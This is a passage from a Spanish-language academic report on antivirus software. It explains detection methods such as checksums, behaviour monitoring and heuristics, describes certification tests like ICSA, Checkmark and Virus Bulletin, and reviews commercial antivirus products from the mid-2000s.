técnica, se guarda, para cada directorio, un archivo con los CRC de cada archivo y se comprueba periódicamente o al ejecutar cada programa. Los programas de comprobación de suma, sin embargo, sólo pueden detectar una infección después de que se produzca. Además, los virus más modernos, para ocultarse, buscan los ficheros que generan los programas antivirus con estos cálculos de tamaño. Una vez encontrados, los borran o modifican su información (Montesino, 2003)44. 8.3.3 Programas de vigilancia. Ellos detectan actividades que podrían realizarse típicamente por un virus, como la sobre escritura de ficheros o el formateo del disco duro del sistema. En esta técnica, se establecen capas por las que debe pasar cualquier orden de ejecución de un programa. Dentro del caparazón de integridad, se efectúa automáticamente una comprobación de suma y, si se detectan programas infectados, no se permite que se ejecuten (Montesino, 2003)44. 8.3.4 Búsqueda heurística. Las técnicas heurísticas nacen de la necesidad de una “detección genérica” de los virus informáticos. Se llama detección genérica a la posibilidad de detectar “cualquier virus” aún sin haberlo analizado antes y sin estar en la base de datos del antivirus que se esté considerando. Esto pareciera que carece de sentido pero es tan simple como buscar “instrucciones comunes” de los virus para advertir de la posibilidad de que un archivo o programa esté infectado.

106

Cuando analizamos las primeras instrucciones de cualquier archivo, veremos instrucciones para detectar los parámetros de la línea de comandos, borrar la pantalla, llamar a alguna función, ejecutar alguna macro, etc.. No obstante tratándose de un virus suelen ser otras bien diferentes como activar el cuerpo del virus o buscar más archivos para intentar implantarles su código. La experiencia es sin duda lo que lleva a una persona a reconocer algo infectado de algo limpio en cuestión de segundos. Esa “experiencia” se ha pretendido introducir en los programas antivirus bajo el nombre de “heurística”. El funcionamiento de la heurística es sencillo, primero se analiza cada programa sospechoso sin ejecutar las instrucciones, lo que hace es desensamblar o "descompilar" el código de máquina para deducir que haría el programa si se ejecutara. Avisando que el programa tiene instrucciones para hacer algo que es raro en un programa normal, pero que es común en un virus. Sin duda el principal problema de las técnicas heurísticas ha sido los falsos positivos. A pesar de que se han mejorado mucho en los últimos años, siguen sin conseguir demasiada efectividad (aunque hay algunas excepciones). El problema más que en la calidad de la rutina heurística está en la interpretación que el usuario realice de ese aviso heurístico. Si es poco experimentado estará constantemente mandando muestras a su casa de antivirus ya que “el antivirus le dijo que podía tener un virus”. Entendiendo la Heurística como un indicador de probabilidad de contagio, esto nos lleva a considerarla como un sistema de detección mejorada que al incluirla los antivirus nos permite establecer un sistema de alerta y de prevención ante la aparición de mutaciones de virus o de nuevos virus. Esta técnica permite "barrer" diferentes tipos de códigos dentro de los archivos, que sean susceptibles de ser malignos. Códigos que son genéricos dentro de los archivos maliciosos y que siempre suelen ser parecidos. O por lo menos respetar parte de las cadenas de comandos que activan los virus. Pero ¿cómo opera un antivirus? Los virus tienen patrones de códigos que son como sus "huellas digitales". Los software antivirus buscan estos patrones, pero sólo de los que tienen almacenados en su lista (por esto la actualización es tan importante). Estos productos también pueden valerse de la heurística, es decir, analizan los archivos para detectar comportamientos similares a los de los virus. Cada día crece el número de nuevos virus y la alternativa para poder neutralizarlos, sin haber programado antes el antivirus para su reconocimiento, es la denominada “búsqueda heurística”. A través de ella, el programa antivirus analiza el código de los programas buscando instrucciones, acciones sospechosas o indicios que delaten la presencia de virus en la computadora, de acuerdo a los patrones habituales empleados por los códigos maliciosos.

107

El método Heurístico es una tecnología de programación que dentro de sus rutinas de detección de especies virales, incluye las cadenas clásicas que son similares, parecidas o afines a virus auténticos. El método heurístico, si no está bien programado, es susceptible de incurrir en resultados falsos positivos o negativos. Además, al encontrar un virus desconocido, variante de otro existente, el antivirus que emplea este método de búsqueda no podrá eliminar eficientemente el virus y mucho menos reparar el archivo o área afectada. Para que un antivirus detecte y elimine eficientemente a un virus así como también repare los daños ocasionados, debe incluir en la base de datos de sus rutinas de detección y eliminación el exacto micro código viral de esa especie. Sin embargo la técnica de búsqueda heurística de virus por "familias" es una forma eficiente de detectar a especies virales que pertenecen a una misma familia, aunque no es un método absolutamente exacto o eficiente. (Pérez, 2005)58. Con esta técnica, se desensambla el programa y se ejecuta paso a paso, a veces mediante la propia CPU. De ese modo, el programa antivirus averigua qué hace exactamente el programa en estudio y realiza las acciones oportunas. En general, es una buena técnica si se implementa bien, aunque el defecto más importante es la generación de falsas alarmas, que no se tiene la certeza de que un programa sea un virus en función de su comportamiento. La mayoría de los virus nuevos evitan directamente la búsqueda heurística modificando los algoritmos, hasta que el programa antivirus no es capaz de identificarlos (Montesino, 2003)44. 8.4 EVALUACION DE SOFTWARE ANTIVIRUS La expresión “cuál es el mejor antivirus”, puede variar de un usuario a otro. Es evidente que para un usuario inexperto el término define casi con seguridad al software que es más fácil de instalar y utilizar, algo totalmente intranscendente para usuarios expertos, administradores de redes, etc. No se puede afirmar que exista un solo sistema antivirus que presente todas las características necesarias para la protección total de las computadoras; algunos fallan en unos aspectos, otros tienen determinados problemas o carecen de ciertas facilidades. De acuerdo con los diferentes autores consultados, las características esenciales son las siguientes: Gran capacidad de detección y de reacción ante un nuevo virus. Actualización sistemática. Detección mínima de falsos positivos o falsos virus. Respeto por el rendimiento o desempeño normal de los equipos. Integración perfecta con el programa de correo electrónico. Alerta sobre una posible infección por las distintas vías de entrada (Internet, correo electrónico, red o discos flexibles).

108

Gran capacidad de desinfección. Presencia de distintos métodos de detección y análisis. Chequeo del arranque y posibles cambios en el registro de las aplicaciones. Creación de discos de emergencia o de rescate. Disposición de un equipo de soporte técnico capaz de responder en un tiempo mínimo (ejemplo 48 horas) para orientar al usuario en caso de infección. Existen sistemas antivirus que tienen además, la característica de trabajar directamente en redes LAN y WAN, así como en servidores proxy. Ante la masiva proliferación, tanto de virus como de productos dirigidos a su tratamiento, existe la necesidad de que algún organismo reconocido de carácter internacional certifique los productos antivirus y asegure su correcto rendimiento. En un antivirus lo más importante es la detección del virus y, al estudio de tal fin se dedican asociaciones como la ICSA (International Computer Security Association) - anteriormente la NCSA - y la Checkmark. Ambas siguen procedimientos similares. En concreto, para que la ICSA certifique un producto antivirus, ha de ser capaz de detectar el 100 % de los virus incluidos en la Wildlist (lista de virus considerados en circulación) y, al menos, un 90 % de la Zoolist -una colección de varios miles de virus no tan difundidos. La certificación de un producto se realiza cuatro veces al año, sin el conocimiento del fabricante y con una versión totalmente comercial, con lo que se asegura que la versión que se certifica es la que recibe directamente el usuario y no una especialmente preparada para la prueba (Montesino, 2003)44. 8.4.1 Pruebas de antivirus de mayor aceptación. A continuación se describen brevemente algunas de los tests de antivirus mas aceptados a nivel mundial. Certificación ICSA. La ICSA (Internacional Computer Security Association) ha estado realizando pruebas de software antivirus desde 1992; muchos productos populares son sometidos a sus varios esquemas de certificación (ICSA). El Scanning al momento del acceso y por solicitud son parte de su siempre creciente criterio de certificación; el criterio para remoción de virus fue agregado en julio de 1999. Los tests de detección primaria se dividen en dos secciones: la detección de virus en the Wild , y la detección de virus en el zoo. La lista zoo mantenida por el personal de ICSA es grande y completa; los productos deben detectar al menos el 90% de estos virus. Los tests de los virus en the Wild ahora usan muestras que han sido replicadas del set de muestras de The Wildlist Organization´s Wildcore. Estos virus han sido confirmados como amenaza activa para los usuarios.

109

Para ser certificados por la ICSA, los productos deben detectar el 100% de estos virus, usando la versión de The Wildlist que haya sido lanzada un mes antes de la fecha de la prueba. Adicionalmente un criterio de “Infecciones Comunes” asegura que cualquier virus que la ICSA considere importante se debe tratar en la forma en que la ICSA considera apropiada. El test de falsas alarmas fue adicionado en 1999. Westcoast Labs Checkmark. Westcoast Publishing se estableció como lider mundial en la prueba y certificación de software antivirus a mediados de los noventa con su introducción de el Westcoast Labs Checkmark. Los criteros de prueba dependen del nivel de certificación para el que se aplique. El nivel uno mide la habilidad del producto evaluado para detectar todos los virus en The Wild, usando muestras basadas en la edición de la WildList de no menos de dos meses antes del lanzamiento del producto. En el nivel dos los productos también tienen que desinfectar esos virus. Además las pruebas de nivel dos usan la versión de la WildList que haya sido publicada un mes antes del lanzamiento del producto. Ambas pruebas son llevadas a cabo usando virus replicados por West Coast, midiendo asi la habilidad de los productos para detectar virus que constituyen la amenaza real. Muchos productos populares son sometidos a este esquema de prueba. Los productos certificados son anunciados regularmente. Prueba VTC Malware de la Universidad de Hamburg. Bajo la supervisión del experto en seguridad y antivirus Dr Klaus Brunnstein, los estudiantes del VTC (Virus Test Center) de la Universidad de Hamburg han estado diseñando y realizando pruebas de software antivirus desde 1994. Los resultados de estos proyectos se distribuyen gratuitamente al publico en general. Esas pruebas han evolucionado desde simples pruebas de detección de virus de booteo y de archivos en 1994 hasta las actuales pruebas de virus (y malware). En adición a su gran colección Zoo, a principios de 1999, el VTC empezó a usar ejemplos copiados de la colección de virus en The Wild de la WildList Organization en sus pruebas, asegurando de esta manera una representación acertada de la habilidad del producto para enfrentar una amenaza real de estos virus. Universidad de Magdeberg. Andreas Marx y sus proyectos de prueba de antivirus para el ATC (Antivirus Test Center) de la Universidad de Magdeberg, hechos en cooperación con GECA Software & Medienservice, son relativamente nuevos en el área de la evaluación de antivirus. Las pruebas, patrocinadas por compañías de antivirus, proveen resultados a revistas como CHIP, FreeX, Network World, PC Shopping y PC welt; los resultados de estas pruebas han sido incluidos en las reseñas que han publicado.

110

De acuerdo a Marx, la mayoría de los criterios de prueba han sido escogidos por administradores de redes, usuarios, revistas, Compañías AV y la Universidad. Estos criterios incluyen detección de virus en The Wild, y desinfección. Los resultados son publicados en inglés y en alemán. Virus Bulletin. El VB ha estado probando productos antivirus desde que la publicación comenzó en 1989. Los productos para las varias plataformas son revisados regularmente en las Reseñas Comparativas del VB, las cuales prueban los productos con una colección Zoo (Infecciones de archivos estándar de DOS y Windows, virus macro y virus polimorficos) así como también con un grupo de virus en The Wild. Para cada comparativa, el grupo de virus en The Wild del Virus Bulletin está basado en una versión del WildList anunciada aproximadamente dos semanas antes de la fecha límite de entrega del producto (Gordon, 2005)30. 8.4.2 Por qué los sistemas de evaluación de antivirus deben evolucionar. Dado que las pruebas de antivirus han mejorado dramáticamente durante los últimos años a medida que la comunidad evaluadora se vuelve más experta, la necesidad de tener pruebas más completas no se ve muy claramente, en esta sección se examinaran las razones por las que las pruebas deben pasar al siguiente nivel. La introducción y desarrollo del WildList como criterio de prueba proporcionó el grado de realismo adecuado a la industria de los antivirus. Con este criterio, los usuarios tienen ahora una idea mínima de lo que cualquier antivirus competente (y apropiadamente actualizado) debería detectar. Este criterio es la piedra angular de las pruebas importantes de antivirus. De hecho, algunos de los agentes que ejecutan estas pruebas se han cambiado a un WildList mensual, que permite mostrar a los usuarios la habilidad de los productos para responder a la siemprecambiante amenaza. Sin embargo, El incremento de amenazas de virus de rápida propagación como Melissa y LoveBug, resalta la necesidad de un cambio más complejo de enfoque en los ambientes de prueba. La industria de pruebas también ha avanzado con varias evaluaciones relacionadas con la desinfección, y el desempeño de scanners activados en el momento de acceso. La certificación VB100% ofrecida por el Virus Bulletin recientemente adicionó pruebas “de acceso” a su lista de criterios de evaluación de los antivirus; ICSA y WestCoast Labs han implementado recientemente pruebas de desinfección. Es claro que las pruebas siguen avanzando a medida que la industria madura. Sin embargo, la sola expansión no es suficiente. En la medida que los productos se vuelven más complejos, se requieren pruebas más complejas. Esto inmediatamente representa un aumento en los costos, por lo tanto es importante expandir la tecnología de prueba en las áreas que son mas importantes para la protección del usuario, usando las métricas más importantes para los usuarios y los desarrolladores (Gordon, 2005)30.

111

8.5 VALORACIÓN DE DIFERENTES CLASES DE SOFTWARE ANTIVIRUS 8.5.1 Norton Antivirus. Este antivirus posee una protección automática en segundo plano. Detiene prácticamente todos los virus conocidos y desconocidos, mediante una tecnología propia, denominada NOVI, que implica el control de las actividades típicas de un virus. Protege la integridad del sistema, actúa antes de que causen algún daño o pérdida de información, con una amplia línea de defensa, que combina búsqueda, detección de virus e inoculación. Utiliza diagnósticos propios para prevenir infecciones en sus propios archivos y de archivos comprimidos. El rastreo puede realizarse manual o automáticamente a partir de la planificación de la fecha y la hora. También, posibilita reparar los archivos infectados por virus desconocidos. Incluye información sobre muchos de los virus que detecta y permite establecer una contraseña para aumentar así la seguridad. La lista de virus conocidos puede actualizarse periódicamente (sin cargo) mediante servicios en línea como Internet, América On Line, Compuserve, The Microsoft Network o el BBS propio de Symantec, entre otros (Manson, 2005)39. Entre las características destacables del Norton Antivirus se encuentra la opción LiveUpdate que automatiza la actualización del motor y de las nuevas definiciones de virus de forma simultánea por Internet. Con la compra del producto, se obtiene Soporte Gold durante un año, que integra línea gratuita de soporte help-desk y actualizaciones de firmas (Hispasec, 2005)33. El menú principal se divide en estado del sistema, estado de correo electrónico, búsqueda de virus, un apartado de informes y un módulo de programación para planificar tareas. Cabe destacar la existencia de un módulo para el análisis de los correo que entran, así como las opciones cuarentena y soporte de muestras sospechosas con el mismo programa. En las pruebas, Norton se ha mostrado débil en la detección de Troyanos y backdoors, indicador que aun se agrava más en el apartado de muestras de la colección Internet. En el resto de las pruebas, aparece en un nivel medio, que decae de nuevo en el apartado de formatos de compresión o en la prueba de instalación en un sistema con virus. Destaca de forma especial en la prueba de detección en correo, donde es la mejor solución de las probadas. En un producto tan integrado en Internet, resulta atrayente la falta de una protección específica a nivel del navegador (Montesino, 2003)44. Los resultados de este análisis con respecto al Norton Antivirus presentan algunas contradicciones con los publicados en otro por la revista PC World. Norton es el que mejores resultados ha ofrecido en las pruebas.

112

Tal vez, demora algo más en completar el proceso de análisis, pero detectó el 100 % de los virus utilizados, con un porcentaje muy bajo de falsos positivos (Contreras, 2005)14. La interfaz de usuario es muy buena, muy sencilla y fácil de utilizar. Desde un único programa se controlan todas las funciones, sin escatimar información. Aunque se puede llamar independientemente al módulo de actualización de nuevas versiones, también puede hacerse desde un icono en la pantalla principal. Después de un proceso de instalación algo tedioso, y que realiza un primer análisis exhaustivo de todos los ficheros, el sistema queda configurado con todas las opciones de análisis activadas. Además de mantener activado el análisis heurístico, también queda activado el escáner manual sobre todo tipo de ficheros, y es precisamente esta la causa de la tardanza en el análisis inicial. El número de opciones que pueden configurarse es muy elevado, y el proceso es simple. El centro de desinfección de Symantec, llamado SARC (Symantec Anti Virus Research Center), recibe los ficheros infectados y, según los distribuidores, es cuestión de horas, obtener una respuesta con un fichero limpio y una nueva actualización. Por otra parte, Norton Antivirus reconoce perfectamente las cuentas de correo que se utilizan y permite protegerlas individualmente. Además, pueden configurarse alertas para enviar un mensaje a otras cuentas de correo o a otro usuario de la red. Finalmente, la actualización de nuevas versiones es un claro ejemplo de simplicidad. No hace falta conectarse a un sitio web y seleccionar cómo queremos actualizar el producto. Lo único que se debe hacer es clic sobre el icono de LiveUpdate y el programa se conecta a Internet y se actualiza automáticamente. Además, la licencia no está limitada en tiempo. Symantec ofrece actualizaciones de por vida (Montesino, 2003)44. 8.5.2 McAFEE VIRUS SCAN. Es uno de los más famosos. Trabaja por el sistema de escaneo descrito anteriormente, y es el mejor en su estilo. Para escanear, hace uso de dos técnicas propias: CMS (Code Matrix Scanning, Escaneo de Matriz de Código) y CTS (Code Trace Scanning, Escaneo de Seguimiento de Código) (Manson, 2003)39. Una de las principales ventajas de este antivirus es que la actualización de las bases de datos de strings es muy fácil de realizar. Ello, sumado a su condición de programa shareware, lo coloca al alcance de cualquier usuario. Es bastante flexible en cuanto a la configuración de cómo detectar, reportar y eliminar virus. McAfee VirusScan es uno de los clásicos entre los productos antivirus y suele ocupar siempre los puestos punteros en sus estudios. La compañía Network Associates adquirió McAfee y el doctor Solomons integró este producto con

113

nuevas tecnologías para analizar los protocolos de Internet, de forma que el módulo VShield permite analizar el tráfico con los navegadores Netscape Navigator e Internet Explorer, así como con los clientes de Outlook Express, Eudora, Netscape Mail, Microsoft Exchange, Outlook y Lotus cc:Mail (Hispasec,2001)33. VirusScan se presenta actualmente con una nueva interfaz algo más futurista, con una imagen que huye de las típicas aplicaciones Windows, donde, sin embargo falta la extrema sencillez y claridad de la anterior interfaz minimalista, basada en pestañas. En lo que a opciones se refiere, además del menú de exploración, se encuentra un planificador de tareas y una sección de cuarentena que permite aislar los archivos infectados y sospechosos y enviarlos de forma automática a los laboratorios AVERT para su análisis. En las pruebas, sin llegar a destacarse de forma especial, se comporta de forma adecuada, tanto a nivel de detección como heurístico, y en el resto de pruebas se sitúa en un punto intermedio. No se ha encontrado mejora significativa alguna en el motor con respecto a otros años, sigue entre los antivirus que menos formatos de compresión soporta. En definitiva, nueva cara para VirusScan y opciones adicionales, si bien se encuentra algo estancado en la tecnología de su motor antivirus donde otros productos han realizado avances significativos (Montesino, 2005)44. McAfee VirusScan es el antivirus más extendido mundialmente. Anuncia en su publicidad que se han vendido más de 70 millones de copias, seguido del Norton Antivirus. Es, curiosamente, el programa antivirus seleccionado por Microsoft para utilizarlo dentro de su webmail hotmail.com (Contreras, 2005)14. En su nueva versión ofrece una interfaz nada convencional; sin embargo, incluye los controles en el menú del botón derecho del ratón, para seleccionar los ficheros que se desean revisar. También mantiene dos iconos pequeños en la esquina derecha de la barra de tareas. La interfaz de usuario no se ajusta a los estándares actuales de ventanas, produce cierta confusión en su uso. Los resultados de las pruebas no fueron muy buenos. Fue capaz de detectar el 94 % de los virus y sólo presentó un 3 % de falsos positivos. En los virus del tipo macro, la desinfección fue muy satisfactoria, al conservarse las macros operativas. El factor más desfavorable en su evaluación fue en la detección en correo. En algunos casos, cuando se adjuntó un fichero infectado con virus a un mensaje, el programa lo detectó hasta que se guardó en el disco.

114

La documentación sobre los virus no se encuentra en el CD, sino que es necesario estar conectado a Internet para poder acceder a ella. Esto supone un problema para cualquier usuario de un equipo que no esté conectado a Internet. Por otra parte, McAfee ofrece un servicio de desinfección para nuevos virus, también a partir de una conexión a Internet. Puede enviarse un fichero en formato comprimido y McAfee se compromete a limpiarlo y devolverlo en cuestión de horas desde los laboratorios AVERT Labs. Mientras tanto, puede colocarse en cuarentena, para evitar su difusión a otros equipos. Las actualizaciones del escáner y del fichero de patrones se hacen también por Internet. Se puede configurar la interfaz para arrancar una actualización al hacer clic con el botón derecho del ratón. Las actualizaciones pueden hacerse de por vida. El resto de los servicios son de carácter indefinido. Es el programa más económico de la esta comparación (Montesino, 2005)44. 8.5.3 Sophos. Con centro en Reino Unido, es uno de los fabricantes de antivirus que más se destaca por su especialización en entornos corporativos y por la cantidad de plataformas que soporta. Junto con el software, el usuario adquiere el servicio de actualizaciones periódicas, alertas y emergencias técnicas vía correo electrónico y soporte por teléfono e Internet. Nada más activar Sophos, se accede a una sencilla interfaz. Mediante tres pestañas, puede accederse a la exploración inmediata, a la agenda para planificar tareas y, por último, a la configuración de InterCheck, el módulo residente. En la barra de herramientas, pueden iniciarse las exploraciones o detenerlas, entrar en el apartado de configuración, alarmas y diccionario de virus. Incluye una relación de todos los virus detectados, con sus propiedades. Si bien este software ofrece un nivel de soporte alto, se trata sin duda del peor producto antivirus de los evaluados en el aspecto técnico. Además de ser uno de los productos que obtiene los índices más bajos de detección, es el único que no es capaz de desinfectar ejecutables, una opción que hoy por hoy no se concibe en antivirus profesionales. En su lugar, este antivirus recomienda que se eliminen los ficheros afectados y que se reemplace por una copia limpia (Hispasec, 2005)33. La interfaz de usuario no es intuitiva, el simple hecho de analizar un directorio obliga a adentrarse en la opción de configuración, y marcar exactamente los tipos de fichero que se desea analizar, porque las opciones de análisis de ficheros comprimidos aparecen deshabilitadas. La configuración del escáner es compleja, obliga a editar un fichero de configuración, algo que nunca podrá hacer un usuario “no experto”. Sin embargo, en las pruebas, ha obtenido resultados muy buenos. Sólo necesita 3 MB de espacio en disco, porque el resto de la documentación la mantiene en el CD. Las funciones de soporte de programas de correo son escasas y el servicio de actualización no está integrado en el programa (Contreras, 2005)14.

115

La principal ventaja de Sophos es su capacidad para trabajar en distintos entornos, como Lotus Notes, Exchange, Novell, etc. Esto lo convierte en una seria opción para sistemas hetereogéneos. 8.5.4 Norman Virus Control. La Norman Data Defense es su productora. Hace unos años se integró con ThunderByte, uno de los antivirus míticos de la época MS-DOS por el uso de técnicas heurísticas. En Norman Virus Control 5.0, la interfaz se renovó completamente, con una filosofía basada en tareas, módulo de cuarentena y con la posibilidad de actualizar las firmas de virus desde el mismo programa por Internet, como mejoras más relevantes a primera vista en comparación con las versiones anteriores. En las pruebas se ha comportado con un nivel medio en general. Se destacó en pruebas como la de soporte telefónico y obtuvo los peores resultados en la consulta por Internet. En la parte técnica, fue muy eficiente en la prueba de instalación en un sistema infectado, donde ha compartido el primer puesto junto con AVP. Sin embargo, carece de una heurística efectiva para los nuevos formatos y módulos de protección específicos para Internet y requiere mejoras en el soporte de formatos de compresión (Hispasec, 2005)33. La interfaz de Norman es interesante. Permite una configuración muy extensa en cuanto a número de opciones. Esto es muy beneficioso para un usuario avanzado, pero puede resultar un poco confuso para un principiante. La versión que se comercializa actualmente se encuentra en inglés (Contreras, 2005)14. Al igual que ocurre con el programa de McAfee, se presenta un icono en la esquina derecha de la barra de tareas, con el que puede accederse a un menú desde el que es posible lanzar todas las funciones. El producto ha obtenido un porcentaje de aciertos del 93 %, bastante elevado. El número de falsos positivos fue del 15 %, con el que clasifica en un lugar mucho más bajo que el resto de productos en este aspecto. Los mejores resultados de Norman fueron en el tratamiento y la detección de virus de tipo macro. El factor más negativo en la evaluación del producto es la falta de integración con Outlook, que obliga a escanear manualmente cada uno de los ficheros que se recibe. El producto se divide en siete programas distintos. Esto dificulta sensiblemente su uso, porque el usuario tiene que saber para qué se utiliza cada uno y seleccionarlo cuando lo crea oportuno. No es fácil saber cuándo se está infectado y, por eso, tampoco lo es, decidir si utilizar un programa de análisis específico sobre un fichero. El programa principal es el que se emplea para hacer el análisis manual de los ficheros. También se puede acceder desde este programa a la configuración de cada una de las opciones.

116

Existen otros programas, como Smart Behavior Blocker, cuya misión es la de analizar el comportamiento de algún programa posiblemente infectado. Este programa debería integrarse en la interfaz principal, para que el usuario no se vea obligado a averiguar para qué sirve y cómo tiene que utilizarlo. El sistema de ayuda también se encuentra íntegramente en Internet. De hecho, si se selecciona la opción de ayuda, se obtiene una página HTML desde la que es posible bajar de Internet todos los manuales del producto en formato PDF. El control que ofrece Norman Virus Control es superior al resto de los programas probados. Además de permitir configurar el programa con una mayor cantidad de opciones, y de incluir programas específicos para analizar virus de tipo Troyano, también puede incluso seleccionarse fragmentos de código que nos interese que el programa no entre a analizar. El costo del programa es razonable, y su licencia se renueva anualmente. El laboratorio de desinfección está en Noruega y el envío del programa infectado también se realiza mediante la página web de Norman (Montesino, 2005)44. 8.5.5 Panda Platinum. Panda Software, muy popular en España, lucha fuerte por imponerse a nivel internacional con un producto avanzado y una nueva concepción de servicios añadidos. Con la adquisición de su producto, el usuario obtiene durante un año soporte telefónico 24 horas x 365 días, servicio de desinfección de virus nuevos en 24 horas, actualizaciones diarias del fichero de firmas, así como del software de la aplicación. A primera vista, Panda Platinum conserva la misma interfaz que se destaca por ser similar en su concepción a la de Outlook, sus componentes multimedia, y su integración en los clientes de correo. Uno de los cambios más significativos experimentados por ella no se puede observar a simple vista, y se encuentra en un renovado interior para integrarse de lleno con las nuevas especificaciones de Windows. Es la única solución con soporte telefónico real 24 x 365. En el resto de pruebas de soporte y respuesta ante un virus nuevo también destaca con respecto a la media obtenida por los productos evaluados. Si bien este año, en relación a comparaciones anteriores, lo más sorprendente son sus resultados en las pruebas de detección con unos indicadores, donde destaca, en especial, un primer puesto en la colección de Troyanos y backdoors. También es una de las pocas soluciones que contempla módulos específicos para Internet con análisis a nivel de los diferentes protocolos, incluido el web, correo entrante y saliente, ftp y noticias. Sin embargo, se ha visto algo empañado en la prueba de correo al no soportar la desinfección en Outlook Express. Otro punto a mejorar es el soporte de compresores de ejecutables (Hispasec, 2005)33.

117

Panda es posiblemente el programa antivirus de mayor difusión en España, hecho perfectamente lógico, si se considera que es una empresa española, con una estructura comercial grande y con un servicio técnico en español (Contreras, 2005)14. Panda es uno de los programas más completos y que ha obtenido mejores resultados en esta comparación. El porcentaje de virus detectados fue el segundo más elevado, justo después del Norton Antivirus, y el número de falsos positivos fue el menor. Llama la atención la presentación del producto, con más manuales muy bien editados y con mucha más información que el resto. Así, el usuario no depende tanto de una conexión a Internet para obtener ayuda, que por cierto es muy extensa y clara y, además, en el mismo paquete incluye una breve documentación de todos los virus que se conocen. Evidentemente, para realizar actualizaciones del programa, es necesario conectarse a Internet, aunque también existe un servicio de actualizaciones por CD. Panda también comercializa otros productos relacionados con Platinum 6.0, como el Seguro Antivirus Global, para Exchange, Lotus Notes, Firewall y proxy. Cuando se instala el programa, la opción de análisis heurístico queda deshabilitada. Esto es un poco contradictorio, porque un usuario novato la mantendrá así indefinidamente y el programa no será capaz de ofrecer su máximo potencial de análisis. La integración con Outlook es buena, así como con el software de transferencia de ficheros. El usuario puede configurar el producto para analizar los ficheros según se descarguen de Internet. De esta forma, ningún fichero se quedará en el disco duro sin analizarse. Dentro de un único programa principal, puede seleccionarse la opción de planificación de actividades. En esta opción, puede indicarse cómo se desea que se realicen las actualizaciones del programa, o bien cuándo se quiere que se proceda con los análisis. En los materiales utilizados para el manual y las fichas técnicas incluye un par de disquetes de emergencia, y el sistema de ayuda es mucho más extenso que el de otros antivirus estudiados. 8.5.6 F-Secure. Es el detector por excelencia, es el único producto que integra varios motores antivirus de forma paralela, AVP y F-Prot, ambos de reconocido prestigio. Junto con el software, el usuario recibe tres meses de soporte técnico, actualizaciones de firmas vía Internet, y acceso al laboratorio para el envío y solución ante virus nuevos (Hispasec, 2005)33.

118

La interfaz de F-Secure se mantiene con respecto a años anteriores, basada en tareas predefinidas y en la posibilidad de añadir o editar nuevos trabajos de análisis, ello permite una distribución y gestión centralizada, especialmente útil para redes corporativas. Una vez más, como es habitual, F-Secure obtuvo los mayores resultados en las pruebas de detección, fruto de sumar la potencia de AVP y F-Prot en sus análisis. Se ha apreciado una mejora en la velocidad a la hora de escanear grandes colecciones de virus, donde en comparaciones pasadas era particularmente lento. En el apartado de compresión recoge los frutos del motor de AVP que incorpora. No ha destacado en ninguna de las pruebas de soporte, no contempla la potencia heurística que llega a demostrar AVP en su producto, y llama la atención la ausencia de un módulo específico para Internet que hace que caiga en los resultados de este apartado. Por ahora, sólo se ha traducido al idioma español el procedimiento de instalación del producto. Los manuales y la página web también se encuentran en inglés. F-Secure es un antivirus con una gran experiencia. La nueva versión se ha simplificado sensiblemente en cuanto a la interfaz de usuario, pero ahora resulta poco intuitiva. Para encontrar la manera de configurar el producto no hay que acudir al menú de Inicio de Windows, sino que es necesario seleccionar el icono que se encuentra en la esquina derecha de la barra de tareas, y a continuación pinchar en el botón de propiedades (Contreras, 2005)14. En F-Secure, la interfaz de usuario es excesivamente simple. No incluye un panel de control. Desde el menú de inicio de Windows sólo pueden iniciarse los análisis del disco, de disquete o de un determinado directorio. Una vez comenzado el análisis, el usuario debe tomar una decisión sobre cada uno de los virus que encuentre. No puede seleccionarse una opción para continuar hasta el final sin arreglar los problemas, por que, si se escoge Cancelar, se detiene el proceso de análisis. Desde las opciones, pueden seleccionarse los métodos de análisis a utilizar. Se combinaron distintas opciones y, aun así, se obtuvo un resultado algo inferior al resto de los programas analizados en el estudio. No obstante, el resultado es óptimo, y por eso es un producto certificado por ICSA, que asegura que es capaz de detectar más de un 95% de los virus de la Wild List. El costo final del programa es algo elevado. Si se compara con el resto, puede llegar a valer el doble de cualquier otro sistema antivirus. El soporte y la actualización de producto son muy buenos. Para actualizarlo, es necesario conectarse a Internet (Montesino, 2005)44.

119

8.5.7 PC-cillin. Es la solución para estaciones de trabajo Windows que propone Trend Micro, una multinacional conocida por la calidad de sus soluciones antivirus en el terreno de los servidores, toda una garantía para los usuarios domésticos. Junto con el software, el usuario accede al servicio de actualizaciones de patrones de virus y motor antivirus, puede inscribirse en un servicio de noticias sobre virus junto con un calendario mediante un Active Desktop que le mantendrá informado en todo momento. El interfaz de PC-Cillin es similar a Outlook en su concepción, con una barra de botones vertical que permite acceder a las distintas opciones. Se destaca la posibilidad de poder enviar muestras sospechosas a partir de la misma aplicación y un módulo para revisar el correo entrante. En las pruebas de detección PCCillin ha obtenido buenos resultados, como era de esperar en un producto que utiliza las bases de firmas de Trend Micro. Sin embargo, el resultado en el resto de pruebas fue discreto; quedó en los últimos lugares en la prueba de instalación en un sistema infectado, no consiguió detectar la muestra en el apartado de heurística, y se detectaron algunos problemas en el módulo de análisis por Internet, en especial cuando se realiza a través de un proxy por puertos no estándares (Hispasec, 2005)33. Lo primero que llama la atención de este producto es la cantidad de versiones para distintos entornos incluidas en el mismo CD. Ofrece versiones para Solaris, Windows NT, Lotus Notes, Exchange, etc. Es un producto multiplataforma. También dispone de diversos programas dentro de los CD de instalación. Por un lado, se instala el antivirus PC-Cillin, pero además se encuentran productos como ServerProtect, InterScan WebManager, ScanMail e InterScan VirusWall. Todos ellos ofrecen una solución conjunta para la seguridad de la red. Después de realizar las pruebas, se obtuvo una respuesta alta en lo relativo al número de virus detectados. De la misma manera, el número de falsos positivos fue bastante bajo, y, en general, obtuvo una buena valoración en cuanto a fiabilidad (Contreras, 2005)14. La interfaz de usuario es muy amigable. Se parece un poco a Outlook, en cuanto al sistema de menús de la izquierda de la ventana, al presentar una barra de iconos grandes y distintas lengüetas para seleccionar las opciones. El producto se integra muy bien con el cliente de correo. Después de la instalación, se activa la opción de análisis de los POP3 del equipo, por lo que se analizará todo mensaje que llegue a partir de ese momento, sin importar el cliente de correo que se emplee. En la versión de Exchange, la integración es todavía mayor, porque se analizan los archivos adjuntos a los mensajes antes de que los reciba el usuario.

120

